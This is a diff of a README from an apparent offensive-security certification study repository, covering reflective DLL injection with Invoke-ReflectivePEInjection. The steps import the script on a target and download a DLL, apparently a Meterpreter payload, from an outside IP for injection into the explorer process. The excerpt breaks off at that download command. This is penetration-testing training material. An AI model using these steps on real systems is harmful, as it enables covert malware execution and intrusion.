marcel-last/OSEP/src/DLL Injection/Invoke-ReflectivePEInjection/README.md

 ```

-2. To use _Invoke-ReflectivePEInjection_, we must first upload the script to the target machine and import it from its location with `Import-Module`:
+2. Upload the _Invoke-ReflectivePEInjection.ps1_ script in this repository to the target machine and import it from its location with `Import-Module`:
 ```powershell
 Import-Module .\Invoke-ReflectivePEInjection.ps1
 ```

-3. Next we will load the DLL into a byte array and retrieve the `explorer` process ID.
+3. Load the DLL into a byte array and retrieve the `explorer` process ID.
   (**NOTE:** _change the process based on your target environment, you can also load an executables (.exe) bytes into memory as well_):
 ```powershell
 $bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.45.191/met.dll')